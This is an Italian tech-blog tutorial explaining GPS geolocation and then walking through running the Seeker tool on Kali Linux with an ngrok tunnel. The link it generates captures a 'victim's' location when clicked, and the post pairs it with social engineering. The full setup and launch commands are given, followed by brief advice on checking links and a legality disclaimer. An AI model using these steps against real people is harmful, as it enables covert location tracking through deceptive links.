Cari lettori di Tecnogalaxy,  oggi parleremo di Geolocalizzazione, vedremo cos’è, come funziona e se utilizzata con l’ingegneria sociale come può diventare pericolosa.

Come sempre entriamo nel dettaglio del nostro test, materiale utilizzato….come sempre il nostro caro amico Kali Linux, ed un tool di nome Seeker.

La geolocalizzazione è la tecnologia GPS (dall’inglese Global Positioning System), ovvero “sistema di posizionamento globale” integrata nei dispositivi mobili (Android, iOS e Windows Phone) che permette di determinare la posizione geografica di una persona in base, ad esempio, al suo smartphone.

La geolocalizzazione è l’identificazione della posizione geografica nel mondo reale di un dato oggetto, come ad esempio un telefono cellulare o un computer connesso o meno ad Internet, secondo diverse tecniche.

Cosa è possibile fare con la Geocalizzazione

Al giorno d’oggi questa tecnologia può essere impiegata per:

  1. Navigatore satellitare, in bici o in auto, a piedi, infatti applicazioni come Mappe o Google Maps ci forniscono indicazioni stradali per raggiungere un certo punto con estrema facilità.
  2. Utilizzato per i nostri allenamenti,  in questo modo possiamo tenere traccia dei percorsi che abbiamo fatto in allenamento.
  3. Per indicazioni precise sui servizi, negozi della zona in cui ci troviamo in quel momento
  4. Con la geolocalizzazione attiva se scattiamo una foto viene archiviata registrando anche il luogo dello scatto: bellissimo se ci pensiamo

Torniamo al nostro test, apriamo una shell e scriviamo il seguente comando:

cd Scrivania (nel mio caso)
sudo git clone https://github.com/thewhiteh4t/seeker.git

Posizionarsi nella cartella appena scaricata

cd seeker
apt install python3 python3-pip php
pip3 install requests

Avviamo il tool:

sudo python3 seeker.py -t manual

Apriamo una shell e scriviamo il seguente comando per avviare Ngrok:

sudo ./ngrok http 8080

Adesso copiamo il link da inviare al destinatario del test, “Forwarding ….http://…….”

Quando la vittima cliccherà sul link, la shell in ascolto catturerà la posizione:

Come proteggersi?

Come spiegato in altri articoli, prima di cliccare su un link, ricevuto via mail, via sms o altro, assicurarsi della provenienza, di solito questa tecnica è utilizzata assieme all’ingegneria sociale, più è raffinata questa tecnica maggiore sarà il risultato del test.

Come sempre fatene buon uso facendo dei test su vostri device / computer , farli su device/computer non vostri è illegale.

Al prossimo articolo 😊

N.B.: Non mi assumo nessuna responsabilità dell’uso che farete della guida, in quanto stilata per uso didattico e formativo.

Giorgio Perego

IT Manager

Leggi anche:

Ti è stato di aiuto questo articolo? Aiuta questo sito a mantenere le varie spese con una donazione a piacere cliccando su questo link. Grazie!

Seguici anche su Telegram cliccando su questo link per rimanere sempre aggiornato sugli ultimi articoli e le novità riguardanti il sito.

Se vuoi fare domande o parlare di tecnologia puoi entrare nel nostro gruppo Telegram cliccando su questo link.

© Tecnogalaxy.it - Vietato riprodurre il contenuto di questo articolo.